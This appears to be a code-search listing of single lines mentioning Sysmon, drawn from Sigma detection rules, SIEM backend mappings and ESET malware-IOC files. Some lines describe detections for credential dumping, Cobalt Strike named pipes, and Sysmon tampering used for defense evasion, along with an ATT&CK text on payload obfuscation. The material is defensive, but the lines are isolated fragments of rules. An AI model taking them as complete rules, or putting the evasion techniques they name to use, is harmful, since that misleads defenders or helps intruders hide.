| sigma |
godmode_sigma_rule.yml |
service: sysmon |
DRL 1.0 |
| sigma |
cron_files.yml |
- https://github.com/microsoft/MSTIC-Sysmon/blob/main/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml |
DRL 1.0 |
| sigma |
win_alert_mimikatz_keywords.yml |
EventID: 15 # Sysmon's FileStream Events (could cause false positives when Sigma rules get copied on/to a system) |
DRL 1.0 |
| sigma |
win_sysmon_channel_reference_deletion.yml |
title: Sysmon Channel Reference Deletion |
DRL 1.0 |
| sigma |
win_sysmon_channel_reference_deletion.yml |
description: Potential threat actor tampering with Sysmon manifest and eventually disabling it |
DRL 1.0 |
| sigma |
win_sysmon_channel_reference_deletion.yml |
- https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html |
DRL 1.0 |
| sigma |
win_sysmon_channel_reference_deletion.yml |
- 'WINEVT\Channels\Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| sigma |
win_user_driver_loaded.yml |
- https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
DRL 1.0 |
| sigma |
win_tool_psexec.yml |
description: Detects PsExec service installation and execution events (service and Sysmon) |
DRL 1.0 |
| sigma |
sysmon_ads_executable.yml |
definition: 'Requirements: Sysmon config with Imphash logging activated' |
DRL 1.0 |
| sigma |
file_event_win_mal_adwind.yml |
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
DRL 1.0 |
| sigma |
file_event_win_mal_vhd_download.yml |
definition: in sysmon add "<TargetFilename condition="end with">.vhd</TargetFilename> <!--vhd files for ZLoader and lazarus malware vectors -->" |
DRL 1.0 |
| sigma |
file_event_win_quarkspw_filedump.yml |
# Sysmon: File Creation (ID 11) |
DRL 1.0 |
| sigma |
file_event_win_susp_clr_logs.yml |
- https://github.com/olafhartong/sysmon-modular/blob/master/11_file_create/include_dotnet.xml |
DRL 1.0 |
| sigma |
file_event_win_susp_clr_logs.yml |
definition: Check your sysmon configuration for monitoring UsageLogs folder. In SwiftOnSecurity configuration we have that thanks @SBousseaden |
DRL 1.0 |
| sigma |
file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml |
- https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
DRL 1.0 |
| sigma |
file_event_win_tool_psexec.yml |
description: Detects PsExec service installation and execution events (service and Sysmon) |
DRL 1.0 |
| sigma |
image_load_suspicious_dbghelp_dbgcore_load.yml |
filter2: # Not available in Sysmon, but in Aurora |
DRL 1.0 |
| sigma |
image_load_wmi_module_load.yml |
- 'C:\Windows\Sysmon.exe' |
DRL 1.0 |
| sigma |
image_load_wsman_provider_image_load.yml |
filter_svchost: # not available in Sysmon data, but Aurora logs |
DRL 1.0 |
| sigma |
pipe_created_apt_turla_namedpipes.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
pipe_created_cred_dump_tools_named_pipes.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
pipe_created_efspotato_namedpipe.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
pipe_created_mal_cobaltstrike.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
pipe_created_mal_cobaltstrike_re.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
pipe_created_mal_namedpipes.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
pipe_created_psexec_pipes_artifacts.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
pipe_created_susp_cobaltstrike_pipe_patterns.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
pipe_created_susp_wmi_consumer_namedpipe.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
pipe_created_tool_psexec.yml |
description: Detects PsExec service installation and execution events (service and Sysmon) |
DRL 1.0 |
| sigma |
pipe_created_tool_psexec.yml |
definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575' |
DRL 1.0 |
| sigma |
proc_access_win_cmstp_execution_by_access.yml |
- https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
DRL 1.0 |
| sigma |
proc_access_win_in_memory_assembly_execution.yml |
description: Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious. |
DRL 1.0 |
| sigma |
proc_access_win_in_memory_assembly_execution.yml |
- https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/ |
DRL 1.0 |
| sigma |
proc_creation_win_bypass_squiblytwo.yml |
- Hashes\|contains: # Sysmon field hashes contains all types |
DRL 1.0 |
| sigma |
proc_creation_win_cmstp_com_object_access.yml |
- https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
DRL 1.0 |
| sigma |
proc_creation_win_cmstp_execution_by_creation.yml |
- https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
DRL 1.0 |
| sigma |
proc_creation_win_exploit_cve_2019_1388.yml |
IntegrityLevel: 'System' # for Sysmon users |
DRL 1.0 |
| sigma |
proc_creation_win_exploit_cve_2019_1388.yml |
- 'NT AUTHORITY\SYSTEM' # for non-Sysmon users - English language settings |
DRL 1.0 |
| sigma |
proc_creation_win_false_sysinternalsuite.yml |
- '\Sysmon.exe' |
DRL 1.0 |
| sigma |
proc_creation_win_hacktool_imphashes.yml |
- Hashes\|contains: # Sysmon field hashes contains all types |
DRL 1.0 |
| sigma |
proc_creation_win_hack_wce.yml |
- Hashes\|contains: # Sysmon field hashes contains all types |
DRL 1.0 |
| sigma |
proc_creation_win_malware_formbook.yml |
# e.g. wscript.exe /B sysmon-install.vbs |
DRL 1.0 |
| sigma |
proc_creation_win_malware_notpetya.yml |
- '.dat #1' # Sysmon removes comma |
DRL 1.0 |
| sigma |
proc_creation_win_mal_adwind.yml |
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
DRL 1.0 |
| sigma |
proc_creation_win_rasautou_dll_execution.yml |
definition: Since options '-d' and '-p' were removed in Windows 10 this rule is relevant only for Windows before 10. And as Windows 7 doesn't log command line in 4688 by default, to detect this attack you need Sysmon 1 configured or KB3004375 installed for command-line auditing (https://support.microsoft.com/en-au/help/3004375/microsoft-security-advisory-update-to-improve-windows-command-line-aud) |
DRL 1.0 |
| sigma |
proc_creation_win_renamed_binary.yml |
description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. |
DRL 1.0 |
| sigma |
proc_creation_win_renamed_binary_highly_relevant.yml |
description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. |
DRL 1.0 |
| sigma |
proc_creation_win_susp_char_in_cmd.yml |
#find the sysmon event |
DRL 1.0 |
| sigma |
proc_creation_win_susp_child_process_as_system_.yml |
definition: ParentUser field needs sysmon >= 13.30 |
DRL 1.0 |
| sigma |
proc_creation_win_susp_diskshadow.yml |
definition: 'Requirements: Sysmon ProcessCreation logging must be activated and Windows audit must Include command line in process creation events' |
DRL 1.0 |
| sigma |
proc_creation_win_susp_findstr_385201.yml |
description: Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). |
DRL 1.0 |
| sigma |
proc_creation_win_susp_findstr_385201.yml |
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service |
DRL 1.0 |
| sigma |
proc_creation_win_susp_register_cimprovider.yml |
definition: 'Requirements: Sysmon ProcessCreation logging must be activated and Windows audit msut Include command line in process creation events' |
DRL 1.0 |
| sigma |
proc_creation_win_susp_rundll32_by_ordinal.yml |
- '.dll #' # Sysmon removes , in its log |
DRL 1.0 |
| sigma |
proc_creation_win_susp_workfolders.yml |
definition: 'Requirements: Sysmon ProcessCreation logging must be activated' |
DRL 1.0 |
| sigma |
proc_creation_win_sysmon_driver_unload.yml |
title: Sysmon Driver Unload |
DRL 1.0 |
| sigma |
proc_creation_win_sysmon_driver_unload.yml |
description: Detect possible Sysmon driver unload |
DRL 1.0 |
| sigma |
proc_creation_win_sysmon_driver_unload.yml |
- https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon |
DRL 1.0 |
| sigma |
proc_creation_win_tool_psexec.yml |
description: Detects PsExec service installation and execution events (service and Sysmon) |
DRL 1.0 |
| sigma |
proc_creation_win_uac_bypass_wsreset.yml |
description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config |
DRL 1.0 |
| sigma |
proc_creation_win_uninstall_sysmon.yml |
title: Uninstall Sysinternals Sysmon |
DRL 1.0 |
| sigma |
proc_creation_win_uninstall_sysmon.yml |
description: Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion |
DRL 1.0 |
| sigma |
proc_creation_win_uninstall_sysmon.yml |
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon |
DRL 1.0 |
| sigma |
proc_creation_win_uninstall_sysmon.yml |
sysmon: |
DRL 1.0 |
| sigma |
proc_creation_win_uninstall_sysmon.yml |
- \Sysmon.exe |
DRL 1.0 |
| sigma |
proc_creation_win_uninstall_sysmon.yml |
condition: sysmon |
DRL 1.0 |
| sigma |
registry_event_add_local_hidden_user.yml |
description: Sysmon registry detection of a local hidden user account. |
DRL 1.0 |
| sigma |
registry_event_cmstp_execution_by_registry.yml |
- https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
DRL 1.0 |
| sigma |
registry_event_cobaltstrike_service_installs.yml |
In some SIEM you can catch those events also in HKLM\System\ControlSet001\Services or HKLM\System\ControlSet002\Services, however, this rule is based on a regular sysmon's events. |
DRL 1.0 |
| sigma |
registry_event_disable_microsoft_office_security_features.yml |
definition: key must be add to the sysmon configuration to works |
DRL 1.0 |
| sigma |
registry_event_disable_microsoft_office_security_features.yml |
# Sysmon |
DRL 1.0 |
| sigma |
registry_event_disable_security_events_logging_adding_reg_key_minint.yml |
# Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one |
DRL 1.0 |
| sigma |
registry_event_mal_adwind.yml |
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
DRL 1.0 |
| sigma |
registry_event_mal_netwire.yml |
Note: You likely will have to change the sysmon configuration file. |
DRL 1.0 |
| sigma |
registry_event_mal_netwire.yml |
Per SwiftOnSecurity "Because Sysmon runs as a service, it has no filtering ability for, |
DRL 1.0 |
| sigma |
registry_event_new_dll_added_to_appcertdlls_registry_key.yml |
# Sysmon gives us HKLM\SYSTEM\CurrentControlSet\.. if ControlSetXX is the selected one |
DRL 1.0 |
| sigma |
registry_event_removal_amsi_registry_key.yml |
definition: key must be add to the sysmon configuration to works |
DRL 1.0 |
| sigma |
registry_event_suspicious_keyboard_layout_load.yml |
- https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files |
DRL 1.0 |
| sigma |
registry_event_suspicious_keyboard_layout_load.yml |
definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files' |
DRL 1.0 |
| sigma |
registry_event_susp_service_installed.yml |
- https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
DRL 1.0 |
| sigma |
registry_event_telemetry_persistence.yml |
definition: 'Requirements: Sysmon config that monitors \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController subkey of the HKLU hives' |
DRL 1.0 |
| sigma |
sysmon_accessing_winapi_in_powershell_credentials_dumping.yml |
service: sysmon |
DRL 1.0 |
| sigma |
sysmon_config_modification.yml |
title: Sysmon Configuration Change |
DRL 1.0 |
| sigma |
sysmon_config_modification.yml |
description: Detects a Sysmon configuration change, which could be the result of a legitimate reconfiguration or someone trying manipulate the configuration |
DRL 1.0 |
| sigma |
sysmon_config_modification.yml |
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon |
DRL 1.0 |
| sigma |
sysmon_config_modification.yml |
service: sysmon |
DRL 1.0 |
| sigma |
sysmon_config_modification_error.yml |
title: Sysmon Configuration Error |
DRL 1.0 |
| sigma |
sysmon_config_modification_error.yml |
description: Someone try to hide from Sysmon |
DRL 1.0 |
| sigma |
sysmon_config_modification_error.yml |
- https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html |
DRL 1.0 |
| sigma |
sysmon_config_modification_status.yml |
title: Sysmon Configuration Modification |
DRL 1.0 |
| sigma |
sysmon_config_modification_status.yml |
description: Someone try to hide from Sysmon |
DRL 1.0 |
| sigma |
sysmon_config_modification_status.yml |
- https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html |
DRL 1.0 |
| sigma |
sysmon_config_modification_status.yml |
- 'Sysmon config state changed' |
DRL 1.0 |
| sigma |
sysmon_dcom_iertutil_dll_hijack.yml |
service: sysmon |
DRL 1.0 |
| sigma |
sysmon_process_hollowing.yml |
title: Sysmon Process Hollowing Detection |
DRL 1.0 |
| sigma |
sysmon_process_hollowing.yml |
- https://www.bleepingcomputer.com/news/microsoft/microsoft-sysmon-now-detects-malware-process-tampering-attempts/ |
DRL 1.0 |
| sigma |
sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml |
definition: Works only if Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section |
DRL 1.0 |
| sigma |
sysmon_process_reimaging.yml |
# Sysmon v.10.0 or newer is required for proper detection. |
DRL 1.0 |
| sigma |
sysmon_process_reimaging.yml |
service: sysmon |
DRL 1.0 |
| sigma |
win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml |
definition: Works only if Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section |
DRL 1.0 |
| sigma |
win_possible_privilege_escalation_using_rotten_potato.yml |
definition: Works only if Enrich Sysmon events with additional information about process in ParentUser check enrichment section |
DRL 1.0 |
| sigma |
backend_config.yml |
sysmon: true |
DRL 1.0 |
| sigma |
collection_repeat.yml |
service: sysmon |
DRL 1.0 |
| sigma |
arcsight.yml |
service: sysmon |
DRL 1.0 |
| sigma |
arcsight.yml |
deviceProduct: Sysmon |
DRL 1.0 |
| sigma |
chronicle.yml |
#DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 |
DRL 1.0 |
| sigma |
crowdstrike.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
crowdstrike.yml |
service: sysmon |
DRL 1.0 |
| sigma |
devo-windows.yml |
windows-service-sysmon: |
DRL 1.0 |
| sigma |
elk-windows.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
elk-windows.yml |
service: sysmon |
DRL 1.0 |
| sigma |
elk-windows.yml |
EventLog: Microsoft-Windows-Sysmon |
DRL 1.0 |
| sigma |
elk-winlogbeat-sp.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
elk-winlogbeat-sp.yml |
service: sysmon |
DRL 1.0 |
| sigma |
elk-winlogbeat-sp.yml |
log_name: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| sigma |
elk-winlogbeat.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
elk-winlogbeat.yml |
service: sysmon |
DRL 1.0 |
| sigma |
elk-winlogbeat.yml |
log_name: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| sigma |
fireeye-helix.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
fireeye-helix.yml |
service: sysmon |
DRL 1.0 |
| sigma |
fireeye-helix.yml |
channel: Microsoft-Windows-Sysmon |
DRL 1.0 |
| sigma |
hawk.yml |
product_name: "Sysmon" |
DRL 1.0 |
| sigma |
hawk.yml |
windows-sysmon-status: |
DRL 1.0 |
| sigma |
hawk.yml |
windows-sysmon-error: |
DRL 1.0 |
| sigma |
hawk.yml |
windows-wmi-sysmon: |
DRL 1.0 |
| sigma |
hawk.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
hawk.yml |
service: sysmon |
DRL 1.0 |
| sigma |
hawk.yml |
product_name: 'Sysmon' |
DRL 1.0 |
| sigma |
helk.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
helk.yml |
service: sysmon |
DRL 1.0 |
| sigma |
helk.yml |
index: logs-endpoint-winevent-sysmon-* |
DRL 1.0 |
| sigma |
logstash-windows.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
logstash-windows.yml |
service: sysmon |
DRL 1.0 |
| sigma |
logstash-windows.yml |
Channel: Microsoft-Windows-Sysmon |
DRL 1.0 |
| sigma |
netwitness-epl.yml |
service: sysmon |
DRL 1.0 |
| sigma |
netwitness.yml |
service: sysmon |
DRL 1.0 |
| sigma |
powershell.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
powershell.yml |
service: sysmon |
DRL 1.0 |
| sigma |
powershell.yml |
LogName: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| sigma |
splunk-windows.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
splunk-windows.yml |
service: sysmon |
DRL 1.0 |
| sigma |
splunk-windows.yml |
source: 'WinEventLog:Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| sigma |
sumologic-cse.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
sumologic-cse.yml |
service: sysmon |
DRL 1.0 |
| sigma |
sumologic.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
sumologic.yml |
service: sysmon |
DRL 1.0 |
| sigma |
sumologic.yml |
EventChannel: Microsoft-Windows-Sysmon |
DRL 1.0 |
| sigma |
thor.yml |
service: sysmon |
DRL 1.0 |
| sigma |
thor.yml |
service: sysmon |
DRL 1.0 |
| sigma |
thor.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
thor.yml |
service: sysmon |
DRL 1.0 |
| sigma |
thor.yml |
- "WinEventLog:Microsoft-Windows-Sysmon/Operational" |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
service: sysmon |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
winlog.channel: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
# Sysmon/Operational up to ID 25 |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
ParentUser: winlog.event_data.ParentUser #Sysmon 13.30 |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
SourceUser: winlog.event_data.SourceUser #Sysmon 13.30 |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
TargetUser: winlog.event_data.TargetUser #Sysmon 13.30 |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
#SourceIsIpv6: winlog.event_data.SourceIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
#DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
QueryStatus: sysmon.dns.status |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
IsExecutable: sysmon.file.is_executable |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
Archived: sysmon.file.archived |
DRL 1.0 |
| sigma |
winlogbeat-modules-enabled.yml |
# SYSMON Hashes |
DRL 1.0 |
| sigma |
winlogbeat-old.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
winlogbeat-old.yml |
service: sysmon |
DRL 1.0 |
| sigma |
winlogbeat-old.yml |
log_name: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| sigma |
winlogbeat.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
winlogbeat.yml |
service: sysmon |
DRL 1.0 |
| sigma |
winlogbeat.yml |
winlog.channel: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| sigma |
zircolite.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
zircolite.yml |
service: sysmon |
DRL 1.0 |
| sigma |
zircolite.yml |
Channel: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| sigma |
sysmon.yml |
title: Conversion of Generic Rules into Sysmon Specific Rules |
DRL 1.0 |
| sigma |
sysmon.yml |
service: sysmon |
DRL 1.0 |
| sigma |
sysmon.yml |
service: sysmon |
DRL 1.0 |
| sigma |
windows-services.yml |
windows-sysmon: |
DRL 1.0 |
| sigma |
windows-services.yml |
service: sysmon |
DRL 1.0 |
| sigma |
windows-services.yml |
Channel: 'Microsoft-Windows-Sysmon/Operational' |
DRL 1.0 |
| LOLBAS |
FltMC.yml |
- Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon |
|
| malware-ioc |
misp_invisimole.json |
"https://docs.microsoft.com/sysinternals/downloads/sysmon", |
© ESET 2014-2018 |
| malware-ioc |
oceanlotus-rtf_ocx_campaigns.misp.event.json |
"description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate\/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed\/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.\n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux\/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform\/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)\n\nAnother example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)\n\nDetection: Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).\n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files\/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)\n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: Network protocol analysis, Process use of network, Binary file metadata, File monitoring, Malware reverse engineering, Process command-line parameters, Environment variable, Process Monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL\/TLS inspection\n\nDefense Bypassed: Host forensic analysis, Signature-based detection, Host intrusion prevention systems, Application whitelisting, Process whitelisting, Log analysis, Whitelisting by file name or path\n\nContributors: Red Canary, Christiaan Beek, @ChristiaanBeek", |
© ESET 2014-2018 |
| malware-ioc |
misp-turla-powershell-event.json |
